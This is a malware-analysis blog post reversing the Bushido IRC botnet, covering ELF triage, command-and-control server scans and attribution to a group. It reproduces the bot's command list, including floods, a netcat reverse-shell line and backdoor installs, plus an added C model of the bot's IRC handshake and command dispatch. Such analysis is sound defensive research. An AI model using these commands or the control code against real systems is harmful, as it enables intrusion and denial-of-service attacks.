Reversing Bushido IOT botnet by ZullSec
Yet another Linux botnet sample, this one named Bushido and run by a group called 0ffsecurity, but this time things are a little more interesting: the bad actor is not only using compromised IoT devices as a DDoS attack surface but compromised web servers as well. In this post we will examine how a small infection shell script leads to the unravelling of dozens of malware samples. Solving this case also uncovered the hacker group behind the malware.
Let's get right to it. The infection script downloads a bunch of Linux binaries from the malicious server and runs them; the binaries are compiled for different platforms, as you can see below.
In this post we will reverse only the 64-bit ELF binary, as the rest of the binaries have the same functionality.
These are all the samples that were discovered during the analysis.
| FILE HASH VALUE (SHA-256) | FILE NAME | FUNCTION |
|---|---|---|
| eabee288c9605b29f75cd23204b643cfe4d175851b7d57c3d3d73703bd0f8ec8 | ftp1.sh | downloads the malware samples via FTP and installs them |
| 2544f0299a5795bf12494e2cbe09701cb024b06a0b924c91de0d35efb955a5fe | pma.php | PHP botnet, more on it in a later section |
| 18d6a4280adf67e2adf7a89aa11faa93a5ed6fc9d64b31063386d762b92b45d3 | pma.pl | Perl botnet, more on it in a later section |
Let's see the file information of the binary.
$ file ambvjcv9e0
Let's check the ELF file header.
$ readelf -h x64_ambvjcv9e0
Now the program headers.
$ readelf -l ambvjcv9e0
Nothing unusual here: there is no INTERP segment and no DYNAMIC segment, so the binary does not need the dynamic loader at all. Now let's check the section headers.
$ readelf -S ambvjcv9e0
The binary is not stripped, and it is self-contained because it is statically linked. Since it is not stripped the full symbol table is still present, and with readelf we can list all the symbols, as shown below.
$ readelf -s ambvjcv9e0
There were a lot of symbols, so to keep the post short I have included only a small part of the output. Now let's list all the symbols ending in ".c": in a non-stripped binary these are the FILE symbols, which name the source files the program was compiled from.
$ readelf -s x64_ambvjcv9e0 | grep '\.c$'
One of those FILE symbols is Bushido-IRC.c, interesting! Next, strings. This was the most interesting part of the analysis: you won't even have to open a disassembler to understand what the malware does, strings will confess it all.
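The three readelf checks above (no INTERP or DYNAMIC program header, an SHT_SYMTAB section still present) are worth automating when you have a whole directory of cross-compiled samples to triage. The following C program is an added example written for this post, not a tool from the original write-up or from the malware's authors: it parses the ELF64 headers itself with bounds checks, classifies an image as static or dynamic and stripped or not stripped, and includes a constructed in-memory image so it can be exercised without a sample. It assumes little-endian ELF64 input, which covers the x86-64 binary analysed here but not the 32-bit or big-endian builds.

```c
/* elf_triage.c: added example, not code from the original post or the
 * malware. Automates the readelf checks above: no PT_INTERP and no
 * PT_DYNAMIC program header means statically linked; an SHT_SYMTAB
 * section still present means not stripped. Assumption: only
 * little-endian ELF64 images (the x86-64 sample) are parsed. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct triage {
    int has_interp;    /* PT_INTERP present: needs a dynamic loader */
    int has_dynamic;   /* PT_DYNAMIC present: dynamically linked */
    int has_symtab;    /* SHT_SYMTAB present: symbol table not stripped */
    uint16_t machine;  /* e_machine, EM_X86_64 for the sample */
};

/* Bounds-checked walk of the ELF64 header, program headers and section
 * headers. Returns 1 and fills *t, or 0 if the image is malformed. */
int elf_triage(const unsigned char *buf, size_t len, struct triage *t)
{
    Elf64_Ehdr eh;
    memset(t, 0, sizeof *t);
    if (len < sizeof eh) return 0;
    memcpy(&eh, buf, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_ident[EI_DATA] != ELFDATA2LSB)
        return 0;
    t->machine = eh.e_machine;
    if (eh.e_phnum && eh.e_phentsize < sizeof(Elf64_Phdr)) return 0;
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        uint64_t off = eh.e_phoff + (uint64_t)i * eh.e_phentsize;
        if (off > len || len - off < sizeof ph) return 0;   /* truncated image */
        memcpy(&ph, buf + off, sizeof ph);
        if (ph.p_type == PT_INTERP)  t->has_interp = 1;
        if (ph.p_type == PT_DYNAMIC) t->has_dynamic = 1;
    }
    if (eh.e_shnum && eh.e_shentsize < sizeof(Elf64_Shdr)) return 0;
    for (uint16_t i = 0; i < eh.e_shnum; i++) {
        Elf64_Shdr sh;
        uint64_t off = eh.e_shoff + (uint64_t)i * eh.e_shentsize;
        if (off > len || len - off < sizeof sh) return 0;
        memcpy(&sh, buf + off, sizeof sh);
        if (sh.sh_type == SHT_SYMTAB) t->has_symtab = 1;
    }
    return 1;
}

/* 1 if the image has the sample's profile: statically linked, not stripped. */
int is_static_unstripped(const unsigned char *buf, size_t len)
{
    struct triage t;
    return elf_triage(buf, len, &t) && !t.has_interp && !t.has_dynamic && t.has_symtab;
}

/* Constructed test image, not a runnable program: ELF64/x86-64 with a
 * PT_LOAD, an optional PT_INTERP, and a SHT_SYMTAB section header. */
size_t build_sample(unsigned char *out, size_t cap, int with_interp)
{
    Elf64_Ehdr eh = {0};
    Elf64_Phdr ph[2] = {{0}};
    Elf64_Shdr sh[2] = {{0}};
    uint16_t nph = with_interp ? 2 : 1;
    size_t phoff = sizeof eh, shoff = phoff + nph * sizeof ph[0], total = shoff + sizeof sh;
    if (cap < total) return 0;
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_EXEC;  eh.e_machine = EM_X86_64;  eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = phoff;  eh.e_phentsize = sizeof ph[0];  eh.e_phnum = nph;
    eh.e_shoff = shoff;  eh.e_shentsize = sizeof sh[0];  eh.e_shnum = 2;
    ph[0].p_type = PT_LOAD;
    ph[1].p_type = PT_INTERP;     /* only copied out when with_interp is set */
    sh[1].sh_type = SHT_SYMTAB;   /* sh[0] stays SHT_NULL, as in real files */
    memcpy(out, &eh, sizeof eh);
    memcpy(out + phoff, ph, nph * sizeof ph[0]);
    memcpy(out + shoff, sh, sizeof sh);
    return total;
}

/* Classify a constructed image: 1 static and unstripped, 0 otherwise, -1 on error. */
int check_sample(int with_interp)
{
    unsigned char img[512];
    size_t n = build_sample(img, sizeof img, with_interp);
    return n ? is_static_unstripped(img, n) : -1;
}

/* A truncated image must be rejected rather than read past its end. */
int truncated_is_rejected(void)
{
    unsigned char img[512];
    struct triage t;
    size_t n = build_sample(img, sizeof img, 0);
    return n && !elf_triage(img, n - 1, &t);
}

int main(int argc, char **argv)
{
    unsigned char *buf; long n; struct triage t;
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (!f) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    fseek(f, 0, SEEK_END); n = ftell(f); rewind(f);
    buf = malloc(n > 0 ? (size_t)n : 1);
    if (!buf || n < 0 || fread(buf, 1, (size_t)n, f) != (size_t)n) { fclose(f); free(buf); return 2; }
    fclose(f);
    if (!elf_triage(buf, (size_t)n, &t)) { puts("not a little-endian ELF64 image"); free(buf); return 1; }
    printf("machine=%u interp=%d dynamic=%d symtab=%d -> %s, %s\n", (unsigned)t.machine,
           t.has_interp, t.has_dynamic, t.has_symtab,
           t.has_interp || t.has_dynamic ? "dynamic" : "static", t.has_symtab ? "not stripped" : "stripped");
    free(buf);
    return 0;
}
```

Compile with `cc -o elf_triage elf_triage.c` and run `./elf_triage x64_ambvjcv9e0`; the one output line is what `readelf -l` and `readelf -S` tell you spread over two screens. Extending it to the 32-bit builds means repeating the same walk with the Elf32_* types and honouring EI_DATA for the big-endian MIPS and PowerPC variants.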
$ strings ambvjcv9e0
There were lots of strings, and just by skimming through them you can make out the functionality of the malware. Here is a summary of the interesting strings you will find:
- CNC server IP
- usernames and passwords used to brute force the telnet service
- HTTP headers
- Browser user agent strings
- lots of racist comments and foul words
- lots of IRC commands and strings
- malware usage/help strings
- malware update bash command and other shell commands
- error handling messages
- libc function names
- nmap scan commands and error logging
- build file names
Looking at the strings you can make a reasonable judgment of what the malware does. But to investigate the execution flow and how the malware connects to the CNC we have to dig further. Since we found the IP in the strings, we can do a simple port scan of the CNC server; this is where I found the malicious Perl and PHP code, more on it in the next section.
Once you see an IP address inside a binary it is a natural instinct to port scan it, so an innocent nmap scan of the server gave the following results.
Server A (IP 220.127.116.11): this server was serving the malware.
21/tcp open ftp
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| 1024 b3:ae:e9:79:22:65:37:15:13:66:c8:8f:0a:81:13:ec (DSA)
|_ 2048 32:e9:e2:9f:9b:ae:13:e6:99:7a:60:91:9c:38:30:8d (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https?
445/tcp filtered microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
| users: 57
| servers: 1
| chans: 3
| lusers: 57
| lservers: 0
| server: irc.NulL
| version: Unreal18.104.22.168. irc.NulL
| source ident: nmap
| source host: 19A967F7.1F3B5440.6D396E3B.IP
|_ error: Closing Link: kksqfgqca[22.214.171.124] (Client has disconnected from ZullSec)
From the scan results a couple of deductions can be made:
- It is an IRC based CNC server (plus we found IRC commands in the strings, which confirms that assumption).
- FTP is probably serving files. To investigate further I connected to the FTP server with the default anonymous credentials (username and password both "anonymous") and it worked!
- Once connected you will find the binaries we saw earlier; wandering around a little you will also stumble upon other files, pma.php and pma.pl (more on these in the malware functionality section), and other shell scripts which download the binaries and run them.
- There was another update script called 8UsA1.sh, which did the same but connected to a different IP address, 126.96.36.199.
Server B (IP 188.8.131.52): this server was found in 8UsA1.sh, so let's do another innocent nmap port scan. Nothing interesting on this server, just a plain HTTP service; the results are shown below.
80/tcp open http
443/tcp open https
Running: Linux 2.6.X
OS details: Linux 2.6.18 - 2.6.22
From our earlier findings it is a reasonable assumption that this malware is an IRC botnet hosted on Server A. If you connect to the server with any IRC client you will find two channels on that IRC server:
- #pma - this is the channel the infected web servers running the PHP/Perl script join. Since the PHP/Perl code was not obfuscated it was very easy to read.
- #zull - this is the channel the Linux binary malware joins and then waits for commands.
Once the malware is running it connects to the IRC server with the following command: NICK[ZULL|x86_64]ZM5z. The format of the command is NICK[
Since the binary's symbols are not stripped, you can read the disassembly effortlessly. Based on that you can make the following claims:
- DDoS attacks are the main functionality of the malware. There are many types: ICMP flood, and TCP and UDP based attacks.
- The malware client can be enabled/disabled by the CNC (not sure why). Disabling requires a password, "FreakIsYourGod!!!", which can be found in the binary.
- The malware client can be updated by fetching updated binaries from the server; there is another update mechanism by which the malware downloads the source code, compiles the binary and deletes the source.
- The malware client can also download and compile arbitrary C files and delete the source code. This feature lives in the same function as the previous one, but a single variable switches between the two execution flows.
- The malware joins the #zull channel with the password topkeka.
- It can hop to a different server when instructed by the current CNC.
Digging further you will find an array of structures where the first field is a pointer to a string (the name of the command) and the next field is a pointer to the function that implements it: a classic command dispatch table, which is where to start when you want the full command set.
So far we understand that the bad actor compromises IoT devices or web servers and uses them as DDoS attack agents. Commands are given to the infected devices through IRC channels: the bad actor uses #zull to command the IoT devices and #pma to command the web servers. The IoT devices are infected with the binaries and the servers with the PHP or Perl script. The functionalities of both are described in more detail in the next section.
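Taken together, the join sequence (NICK [ZULL|arch]..., then JOIN #zull with the key topkeka) and the name/function-pointer table are the whole control path of the bot, and it helps to see them in working code. The program below is an added example written for this post, not code from the Bushido sample: it models the registration lines and a command table of the shape the disassembly shows, with a parser that pulls the command out of an IRC PRIVMSG and dispatches it through the table. The handler names, the argument layout, the optional "!" prefix, the USER line and the fact that the flood handler only records state rather than sending packets are all assumptions made for the example; the DISABLE password and the channel key are the strings quoted above.

```c
/* bot_dispatch.c: added example, not code from the Bushido sample. Models
 * the registration the bot sends (NICK [ZULL|arch]suffix, JOIN #zull with
 * key topkeka) and the {name, handler} table the disassembly shows.
 * Assumptions: the command is the first word of the PRIVMSG text with an
 * optional '!' prefix, the USER line is generic, and handlers only update
 * state (no packets are sent). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DISABLE_PASS "FreakIsYourGod!!!"   /* password string found in the binary */
#define MAX_ARGS 8

enum { CMD_OK = 0, CMD_DENIED = 1, CMD_UNKNOWN = 2, CMD_BADARGS = 3 };

struct bot_state {
    int packeting_enabled;  /* toggled by ENABLE / DISABLE */
    int flood_running;      /* set by a flood command, cleared by DISABLE */
    char reply[128];        /* what the bot would say back on the channel */
};

typedef int (*handler_fn)(struct bot_state *b, int argc, char **argv);

/* Registration lines sent after connecting (post: NICK[ZULL|x86_64]ZM5z). */
const char *build_handshake(const char *arch, const char *suffix)
{
    static char out[256];
    snprintf(out, sizeof out, "NICK [ZULL|%s]%s\r\nUSER zull 8 * :zull\r\nJOIN #zull topkeka\r\n",
             arch, suffix);
    return out;
}

static int cmd_enable(struct bot_state *b, int argc, char **argv)
{
    (void)argc; (void)argv;
    b->packeting_enabled = 1;
    snprintf(b->reply, sizeof b->reply, "Packeting enabled");
    return CMD_OK;
}

/* DISABLE needs the password; a wrong or missing one leaves state untouched. */
static int cmd_disable(struct bot_state *b, int argc, char **argv)
{
    if (argc < 2 || strcmp(argv[1], DISABLE_PASS) != 0) return CMD_DENIED;
    b->packeting_enabled = 0;
    b->flood_running = 0;
    snprintf(b->reply, sizeof b->reply, "Packeting disabled");
    return CMD_OK;
}

/* UDP <host> <port> <seconds>: only records that a flood would start. */
static int cmd_udp(struct bot_state *b, int argc, char **argv)
{
    if (argc < 4) return CMD_BADARGS;
    if (!b->packeting_enabled) return CMD_DENIED;
    b->flood_running = 1;
    snprintf(b->reply, sizeof b->reply, "Flooding %s:%s for %ss", argv[1], argv[2], argv[3]);
    return CMD_OK;
}

/* The array of structs from the disassembly: name string, then function pointer. */
static const struct { const char *name; handler_fn fn; } commands[] = {
    { "ENABLE", cmd_enable }, { "DISABLE", cmd_disable }, { "UDP", cmd_udp },
};

/* Case-insensitive compare, kept local to stay within standard C. */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (toupper((unsigned char)*a) != toupper((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Take ":nick!u@h PRIVMSG #zull :CMD a b c", split the trailing text into argv
 * and call the matching handler. Non-PRIVMSG lines (PING, numerics) and
 * unknown commands return CMD_UNKNOWN. */
int dispatch_irc_line(struct bot_state *b, const char *line)
{
    char buf[512], *argv[MAX_ARGS], *p;
    int argc = 0;
    const char *text = strstr(line, " PRIVMSG ");
    if (!text || !(text = strchr(text + 9, ':'))) return CMD_UNKNOWN;
    snprintf(buf, sizeof buf, "%s", text + 1);
    buf[strcspn(buf, "\r\n")] = '\0';
    for (p = buf; *p && argc < MAX_ARGS; ) {
        while (*p == ' ') p++;
        if (!*p) break;
        argv[argc++] = p;
        while (*p && *p != ' ') p++;
        if (*p) *p++ = '\0';
    }
    if (argc == 0) return CMD_UNKNOWN;
    if (argv[0][0] == '!') argv[0]++;
    for (size_t i = 0; i < sizeof commands / sizeof commands[0]; i++)
        if (ieq(argv[0], commands[i].name)) return commands[i].fn(b, argc, argv);
    return CMD_UNKNOWN;
}

/* Dispatch one line against a fresh, enabled bot. */
int dispatch_fresh(const char *line)
{
    struct bot_state b = { 1, 0, "" };
    return dispatch_irc_line(&b, line);
}

/* After a valid DISABLE, floods are refused until ENABLE re-arms the bot. */
int disabled_bot_refuses_flood(void)
{
    struct bot_state b = { 1, 0, "" };
    dispatch_irc_line(&b, ":op!u@h PRIVMSG #zull :DISABLE " DISABLE_PASS);
    int refused = dispatch_irc_line(&b, ":op!u@h PRIVMSG #zull :UDP 192.0.2.1 80 10") == CMD_DENIED;
    dispatch_irc_line(&b, ":op!u@h PRIVMSG #zull :ENABLE");
    return refused && dispatch_irc_line(&b, ":op!u@h PRIVMSG #zull :!udp 192.0.2.1 80 10") == CMD_OK;
}

int main(void)
{
    struct bot_state b = { 1, 0, "" };
    const char *lines[] = {   /* constructed traffic, not a capture */
        ":op!u@h PRIVMSG #zull :DISABLE wrongpass", ":op!u@h PRIVMSG #zull :UDP 192.0.2.1 80 10",
        ":op!u@h PRIVMSG #zull :DISABLE " DISABLE_PASS, "PING :irc.NulL" };
    fputs(build_handshake("x86_64", "ZM5z"), stdout);
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%-44s -> %d (%s)\n", lines[i], dispatch_irc_line(&b, lines[i]), b.reply);
    return 0;
}
```

When reversing the real table, the same shape applies in reverse: each entry is a pointer to a name string followed by a pointer to a handler, so walking the array in the disassembler and resolving each second field gives the complete command list without reading every handler first. Note that the password check here is an ordinary strcmp, which is exactly why it was recoverable from strings.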
Non-root/non-spoof DDoS commands :
<port, 0 for random> <packet size, 0 for random> : An advanced non spoof UDP flooder modified by Freak
Spoof/root commands :
: A UDP flooder
: An advanced syn flooder that will kill most network drivers
<flags/method> : A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.
: An ICMP packet flooder that will crash most firewalls and use loads of CPU.
Other commands :
- RNDNICK : Randomizes the knights nick
: Changes the nick of the client
: Changes servers
- GETSPOOFS : Gets the current spoofing
: Changes spoofing to a subnet
- DISABLE : Disables all packeting from this client
- ENABLE : Enables all packeting from this client
- KILL : Kills the knight
: Downloads a file off the web and saves it onto the hd
src:bin : Update this bot
: HackPkg is here! Install a bin, using http, no depends!
- VERSION : Requests version of client
- KILLALL : Kills all current packeting
- HELP : Displays this
: Sends this command to the server
: Executes a command
: SH, interactive, sends to channel
: Executes a psuedo-daemonized command
: Get a proper busybox
- INSTALL <http server/file_name> : Download & install a binary to /var/bin
: Execute commands using bash.
- BINUPDATE http:server/package : Update a binary in /var/bin via wget
: Call the nmap wrapper script and scan with your opts.
: Equates to nohup nc ip port -e /bin/sh
- LOCKUP http:server : Kill telnet, d/l aes backdoor from , run that instead.
- GETSSH http:server/dropbearmulti : D/l, install, configure and start dropbear on port 30022.
Commands of the PHP/Perl bot (pma.php and pma.pl) :
- mail [to] [from] [subject] [message]
- dns [host]
- raw [irc] [data]
- eval [php] [code]
- exec [command] [args]
- cmd [command] [args]
- udpflood [ip] [port] [time] [packet] [size]
- tcpconn [host] [port] [time]
- slowread [host] [port] [page] [sockets] [time]
- slowloris [host] [time]
- l7 method [host] [time]
- post [host] time
- head [host] [time]
- tcpflood [host] [port] [time]
- httpflood [host] [port] [time] [method] [url]
- proxyhttpflood [targetUrl(with http://)] [proxyListUrl] [time] [method]
- cloudflareflood [host] [port] [time] [method] [url] [postFields]
- ud.server [host] [port] [pass] [chan]
This functionality resembles what we saw earlier in the binary.
Once you are connected to the IRC server you will see the following information on the channel.
I tried searching Twitter for the names seen in the above image, and these are the accounts I found:
I couldn't find other accounts; these people belong to a group called 0ffsecurity. My guess is they are trying to sell this botnet as a service, as a little Google search turns up the following accounts.
These are the accounts for the botnet product:
This malware is not new in this space, and I am quite sure these people have borrowed a lot of code from Mirai and turned it into a new DDoS tool; note, though, that the help text above (RNDNICK, GETSPOOFS, "Kills the knight") is inherited verbatim from the much older Kaiten/Tsunami IRC bot, so that family is clearly part of the binary's lineage as well. They are also using compromised web servers as DDoS agents, and they use an IRC server as the common CNC to control both the infected web servers and the IoT devices.